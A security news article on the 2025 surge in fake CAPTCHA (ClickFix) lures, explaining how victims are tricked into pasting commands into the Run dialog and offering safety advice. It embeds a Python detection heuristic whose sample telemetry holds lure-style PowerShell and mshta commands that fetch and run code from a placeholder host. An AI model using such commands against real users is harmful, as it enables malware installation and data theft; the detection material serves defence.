Fake CAPTCHA attacks exploded by 563% last year: How to spot them and stay safe online
Publish Time: 24 Feb, 2026



Key takeaways

  • Malicious CAPTCHAs are becoming increasingly popular as a lure.  
  • Their use increased 563% in 2025 compared with 2024.
  • Spotting a fake CAPTCHA can be challenging, but here's how. 

CAPTCHAs can be annoying, but they provide a level of user verification that can help web services defend against a range of cyber threats. 

Unfortunately, they can also be employed as malicious lures that target visitors, and appear to be becoming a weapon of choice for modern cybercriminals. 


According to CrowdStrike's 2026 Global Threat Report, published on Tuesday, fake CAPTCHA lures are being adopted at breakneck speed by attackers hoping to compromise your devices. Over the past two years, their popularity has increased to the point that malicious browser update lures are being retired in favor of them. 

What is a CAPTCHA?

A CAPTCHA, otherwise known as the wordy "Completely Automated Public Turing Test to tell Computers and Humans Apart," is a challenge-and-response mechanism found on websites. 

CAPTCHAs set a challenge that distinguishes between human and robotic visitors to a website, resource, or online service. These challenges may take the form of visual puzzles. Or you may have to type a word or set of letters and numbers that have been distorted to make it difficult for robots to identify properly. You also may be asked to hold a button down for a set amount of time to prove you are human. 


These mechanisms were first designed to stop bots and other automated agents from flooding forums and platforms with spam messages and replies, but they are now also used to slow brute-force password login attempts, automated mass purchases or signups, scraping, and other bot-driven abuse. 

They're frustrating, true, especially when the system can't verify that you are human through the first exercise -- which may mean you have to complete one or two more puzzles. This is especially a problem if you have accessibility needs. However, they are now part of life online and do provide a layer of protection for websites facing automated threats. 

CrowdStrike's findings

According to CrowdStrike's report, last year, many cybercriminals moved away from browser-update-related phishing lures toward fake CAPTCHA tactics. 

Compared with 2024 security event data, the research team reported a 563% increase in fake CAPTCHA lures in 2025, while browser update lures declined over the same period. 

Figure: Criminal use of malicious browser update lures and fake CAPTCHA lures, from January 2024 to December 2025 (source: CrowdStrike)

Why are CAPTCHAs used as cybercriminal tools?

There is a wide variety of CAPTCHA designs and mechanisms, so an unfamiliar one does not look out of place, and threat actors exploit this lack of uniformity.


At their core, malicious CAPTCHAs are used to lure a victim into performing an action resulting in the download and execution of malware or a visit to a malicious website. They may include system-level instructions, links to divert user traffic, or even QR codes that will send you to a phishing domain.

Cybercriminal campaigns involving malicious CAPTCHAs are most commonly associated with the deployment of Trojans, information stealers, and spyware. 

How to spot fake CAPTCHAs and what to do next

Most often, fake CAPTCHA windows are used to try to lure a victim into hacking themselves. 

It's a social engineering method that preys on users who are less tech-savvy. If you've ever heard of ClickFix, it's the same principle: display an alert that demands you take action, abuse our instinct to problem-solve, provide a set of instructions, and entice the victim to install the malicious package themselves, preferably while staying under the radar of security tools. 

This is how they work. A fake CAPTCHA appears on a compromised or suspicious website. Instead of a puzzle or word game, you will be asked to verify that you are not a robot in another way -- and this involves following a set of instructions. 


To make "verification" easy, the instructions are reduced to a few simple prompts: press Win + R to open the Windows Run dialog (or open a terminal), paste what the page has already placed on your clipboard, typically when you clicked its verification box, and press Enter. The pasted text is not a verification message but a command, and running it starts PowerShell (or another script host), which fetches and executes a malicious payload on your system.

Because you launched that command yourself, outside the browser, the browser's anti-phishing and download protections never see it; only security software running on the machine itself has a chance to catch the payload. 
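What that execution chain looks like from the defender's side can be shown with a small heuristic. The following Python is an added example, not code from this article, from CrowdStrike, or from Ed Bott: it scores process-creation events (fields modelled on Sysmon Event ID 1 or similar EDR telemetry) for the combination a ClickFix-style lure produces: a script host started from the Run dialog (so its parent is explorer.exe), a hidden window, a download cradle, and the reassuring "I am not a robot" comment the lure appends so the victim sees friendly text in the Run box. The events, hostnames (example.invalid) and indicator weights are constructed for this example and are not real campaign indicators.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Script hosts a pasted ClickFix command typically lands in. The Run dialog
# hands the text to the shell, so the first process is one of these.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe"}

# (indicator name, weight, pattern). Weights are this example's own judgement,
# not a vendor scoring scheme; tune them against your own telemetry.
INDICATORS = [
    ("hidden-window",   2, re.compile(r"-w(indow(style)?)?\s+h(idden)?\b|/min\b", re.I)),
    ("download-cradle", 2, re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|"
                                      r"invoke-restmethod|downloadstring|curl\.exe|certutil)\b", re.I)),
    ("remote-url",      1, re.compile(r"https?://", re.I)),
    ("encoded-command", 2, re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("mshta-remote",    2, re.compile(r"mshta(\.exe)?\s+https?://", re.I)),
    # The lure appends a comment so the victim sees reassuring text in the Run box.
    ("captcha-comment", 3, re.compile(r"#\s*.*(not a robot|verification|captcha|ray id)", re.I)),
]


@dataclass
class Finding:
    pid: int
    command_line: str
    score: int = 0
    reasons: list = field(default_factory=list)


def score_event(ev: dict) -> Optional[Finding]:
    """Score one process-creation event; None if the image is not a script host."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS:
        return None
    f = Finding(pid=ev["ProcessId"], command_line=ev["CommandLine"])
    # Win+R launches its target as a child of explorer.exe. Developers do start
    # shells that way too, so this only adds weight; it never flags on its own.
    if parent == "explorer.exe":
        f.reasons.append("parent-explorer")
        f.score += 2
    for name, weight, rx in INDICATORS:
        if rx.search(ev["CommandLine"]):
            f.reasons.append(name)
            f.score += weight
    return f


def detect(events, threshold: int = 4):
    """Return findings at or above the threshold, in event order."""
    out = []
    for ev in events:
        f = score_event(ev)
        if f is not None and f.score >= threshold:
            out.append(f)
    return out


# Constructed sample telemetry: two lure executions, three benign launches,
# and one non-script process. Not real campaign data.
SAMPLE_EVENTS = [
    {"ProcessId": 4112, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr 'http://example.invalid/verify.txt' -UseBasicParsing)\""
                    " # I am not a robot - reCAPTCHA Verification ID: 7811"},
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/captcha/ray.mp4 # Verification ID 3042"},
    {"ProcessId": 5200, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-ChildItem -Recurse | Measure-Object"'},
    {"ProcessId": 5304, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    {"ProcessId": 700, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"ProcessId": 6001, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f.pid} score {f.score} {f.reasons}: {f.command_line}")
```

On a real host the same command line is also left behind in the Run dialog's history, the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU registry key, which is a quick place to look when triaging a machine whose user reports a "verification" step; the scoring above is deliberately additive so that a developer opening PowerShell from Win+R scores too low to be flagged on its own.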

You may also come across "errors" in a CAPTCHA window that asks you to visit a different web page -- with a spoofed or phishing domain link provided -- instead, in order to access the content you were trying to reach. 

Author Ed Bott followed the trail of a fake CAPTCHA (note: do not try this at home). In his example, the fake CAPTCHA displayed the familiar Cloudflare logo and claimed that unusual traffic had been detected. The notice then showed a set of Windows instructions asking the user to copy and paste a command-line instruction for "manual verification" purposes. 


Unsuspecting users who ran the instruction would unwittingly download a payload onto their PC, detected as Trojan:PowerShell/FakeCaptcha, which would then steal information from the machine.  


To prevent yourself from falling for a fake CAPTCHA, here's some advice:

  • Do not run any system-level command requested online, and that includes any copy-and-paste instructions. A genuine CAPTCHA never needs the Run dialog, a terminal, or PowerShell; anything beyond an annoying puzzle or letter exercise is most likely a scam attempt and is not worth the risk to your security and privacy. 
  • If a CAPTCHA message asks you to run anything, simply don't. If you already have, assume the machine is compromised: disconnect it from the network, run a full scan with your security software, and change your passwords from a different device, since these payloads are typically information stealers. 
  • Keep your browser up to date and enable real-time web scanning. While this may not prevent you from encountering fake CAPTCHAs, you may be alerted if your browser detects a malicious window or a phishing website.
  • Don't panic. Cybercriminals will try to frighten users into performing an action quickly rather than taking a step back and considering whether or not an alert is real. If you come across an error display or an urgent action message, take a few seconds to think about how genuine it is (it probably isn't). After that, close the tab.
  • Consider using an ad blocker. They won't always capture phishing pop-ups or fake CAPTCHAs, but they may help -- and at the least, they will clean up your browsing experience. 
  • Strange URL links, spelling mistakes, and odd word choices may all indicate you are facing a CAPTCHA lure. Be wary. 
  • Read our guide and top tips for browser security and hygiene to keep your system safe.